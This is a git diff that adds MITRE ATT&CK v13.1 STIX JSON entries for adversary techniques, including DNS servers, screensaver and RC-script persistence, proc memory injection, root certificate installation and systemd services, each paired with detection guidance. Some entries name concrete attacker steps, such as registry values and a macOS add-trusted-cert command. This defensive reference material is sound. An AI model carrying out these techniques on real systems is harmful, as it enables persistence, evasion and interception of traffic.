C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\n\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_detection": "Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Certificate: Certificate Registration", + "Internet Scan: Response Content" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81.json new file mode 100644 index 0000000000000000000000000000000000000000..ee1dfc53fb73857bf6a304e6234937190104a51a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--8892d38c-048c-4efb-9762-9b2c14ea500a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81", + "type": "attack-pattern", + "created": "2020-10-01T00:40:45.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1583.002", + "url": "https://attack.mitre.org/techniques/T1583/002" + }, + { + "source_name": "Unit42 DNS Mar 2019", + "url": "https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/", + "description": "Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can be (ab)used by malicious actors. Retrieved October 3, 2020." + } + ], + "modified": "2021-04-15T02:49:49.702Z", + "name": "DNS Server", + "description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\n\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf.json new file mode 100644 index 0000000000000000000000000000000000000000..1b087a2ab0fba71b9c40f2fbe5492b57ce1115a2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--1e45ec1c-5cc9-4365-ad2c-5ca4597420ba", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-21T12:31:54.177Z", + "name": "Screensaver", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations.\n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_contributors": [ + "Bartosz Jerzman" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution", + "Windows Registry: Windows Registry Key Modification", + "File: File Creation", + "File: File Modification" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", + "created": "2020-01-24T13:51:01.210Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/002", + "external_id": "T1546.002" + }, + { + "source_name": "ESET Gazer Aug 2017", + "description": "ESET. (2017, August). Gazing at Gazer: Turla\u2019s new second stage backdoor. Retrieved September 14, 2017.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf" + }, + { + "source_name": "Wikipedia Screensaver", + "description": "Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017.", + "url": "https://en.wikipedia.org/wiki/Screensaver" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591.json new file mode 100644 index 0000000000000000000000000000000000000000..80cce364a89ab3f061fbe152714da4cbea222a36 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591.json @@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--f5dde153-0101-4fd1-9cbb-b3d32af2ba94", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", + "type": "attack-pattern", + "created": "2020-01-14T01:34:10.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1055.009", + "url": "https://attack.mitre.org/techniques/T1055/009" + }, + { + "url": "http://hick.org/code/skape/papers/needle.txt", + "description": "skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.", + "source_name": "Uninformed Needle" + }, + { + "source_name": "GDS Linux Injection", + "url": "https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html", + "description": "McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved February 21, 2020." + }, + { + "source_name": "DD Man", + "url": "http://man7.org/linux/man-pages/man1/dd.1.html", + "description": "Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020." + } + ], + "modified": "2020-06-20T22:25:55.331Z", + "name": "Proc Memory", + "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes\u2019 stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes\u2019 memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_defense_bypassed": [ + "Application control", + "Anti-virus" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847.json new file mode 100644 index 0000000000000000000000000000000000000000..ec744151c9f4e7ed170d4cc879538a89422071fa --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--f25edfba-ab69-4ee8-9928-ba59613d752e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847", + "type": "attack-pattern", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1194", + "external_id": "T1194" + }, + { + "external_id": "CAPEC-163", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/163.html" + } + ], + "modified": "2020-03-02T19:30:53.487Z", + "name": "Spearphishing via Service", + "description": "Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) and [Scripting](https://attack.mitre.org/techniques/T1064).", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1.json new file mode 100644 index 0000000000000000000000000000000000000000..32ce9411160abb36d54e18537783f6424988571f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1.json @@ -0,0 +1,98 @@ +{ + "type": "bundle", + "id": "bundle--393f730f-09d1-4434-a4d2-0b740b463217", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Itzik Kotler, SafeBreach", + "Travis Smith, Tripwire", + "Red Canary", + "Matt Graeber, @mattifestation, SpecterOps" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1", + "type": "attack-pattern", + "created": "2017-05-31T21:31:42.750Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1130", + "url": "https://attack.mitre.org/techniques/T1130" + }, + { + "external_id": "CAPEC-479", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/479.html" + }, + { + "url": "https://en.wikipedia.org/wiki/Root_certificate", + "description": "Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.", + "source_name": "Wikipedia Root Certificate" + }, + { + "url": "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf", + "description": "Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.", + "source_name": "Operation Emmental" + }, + { + "url": "https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/", + "description": "Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.", + "source_name": "Kaspersky Superfish" + }, + { + "source_name": "SpectorOps Code Signing Dec 2017", + "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.", + "url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec" + }, + { + "source_name": "objective-see ay mami 2018", + "description": "Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.", + "url": "https://objective-see.com/blog/blog_0x26.html" + }, + { + "source_name": "Microsoft Sigcheck May 2017", + "description": "Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sigcheck" + }, + { + "url": "https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/", + "description": "Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.", + "source_name": "Tripwire AppUNBlocker" + } + ], + "modified": "2020-02-21T21:11:06.761Z", + "name": "Install Root Certificate", + "description": "Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211.json new file mode 100644 index 0000000000000000000000000000000000000000..dc8aa116b139eaa82bfd14ff7807edb406b33744 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211.json @@ -0,0 +1,91 @@ +{ + "type": "bundle", + "id": "bundle--7fee3bce-756d-4593-94d2-248b9c714adb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "macOS", + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", + "type": "attack-pattern", + "created": "2020-01-15T16:25:22.260Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1037.004", + "url": "https://attack.mitre.org/techniques/T1037/004" + }, + { + "source_name": "IranThreats Kittens Dec 2017", + "url": "https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/", + "description": "Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code. Retrieved May 28, 2020." + }, + { + "description": "Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.", + "url": "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/", + "source_name": "Intezer HiddenWasp Map 2019" + }, + { + "source_name": "intezer-kaiji-malware", + "url": "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/", + "description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020." + }, + { + "source_name": "Apple Developer Doco Archive Launchd", + "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html", + "description": "Apple. (2016, September 13). Daemons and Services Programming Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021." + }, + { + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html", + "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.", + "source_name": "Startup Items" + }, + { + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "source_name": "Methods of Mac Malware Persistence" + }, + { + "source_name": "Ubuntu Manpage systemd rc", + "url": "http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html", + "description": "Canonical Ltd.. (n.d.). systemd-rc-local-generator - Compatibility generator for starting /etc/rc.local and /usr/sbin/halt.local during boot and shutdown. Retrieved February 23, 2021." + } + ], + "modified": "2021-04-27T19:58:01.927Z", + "name": "RC Scripts", + "description": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system\u2019s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.\n\nAdversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.\n\nAdversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)\n\nSeveral Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "Monitor for unexpected changes to RC scripts in the /etc/ directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.\n\nMonitor for /etc/rc.local file creation. Although types of RC scripts vary for each Unix-like distribution, several execute /etc/rc.local if present. ", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "File: File Modification", + "Process: Process Creation", + "Command: Command Execution", + "File: File Creation" + ], + "x_mitre_permissions_required": [ + "root" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b.json new file mode 100644 index 0000000000000000000000000000000000000000..6be303a0b2bd4a21ad240ec4291e8680d885b784 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b.json @@ -0,0 +1,95 @@ +{ + "type": "bundle", + "id": "bundle--1e195e35-bf95-4343-a37e-9c547d2a32b1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-12T20:13:07.604Z", + "name": "Systemd Service", + "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. \n\nSystemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`). (Citation: lambert systemd 2022) \n\nService unit files use the following directives to execute system commands:(Citation: freedesktop systemd.service) \n\n* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives cover execution of commands when a service is started manually by `systemctl`, or on system start if the service is set to automatically start.\n* `ExecReload` directive covers when a service restarts. \n* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives cover when a service is stopped. \n\nAdversaries may abuse systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files systemd uses upon reboot or starting a service.(Citation: Anomali Rocke March 2019) Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.\n\nThe `.service` file\u2019s `User` directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.(Citation: Rapid7 Service Persistence 22JUNE2016) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_contributors": [ + "Tony Lambert, Red Canary", + "Emad Al-Mousa, Saudi Aramco" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor file creation and modification events of Systemd service unit configuration files in the default directory locations for `root` & `user` level permissions. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the `root` user.(Citation: lambert systemd 2022) \n\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: `systemctl list-units -\u2013type=service \u2013all`. Analyze the contents of `.service` files present on the file system and ensure that they refer to legitimate, expected executables, and symbolic links.(Citation: Berba hunting linux systemd)\n\nAuditing the execution and command-line arguments of the `systemctl` utility, as well related utilities such as `/usr/sbin/service` may reveal malicious systemd service execution.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Service: Service Modification", + "Process: Process Creation", + 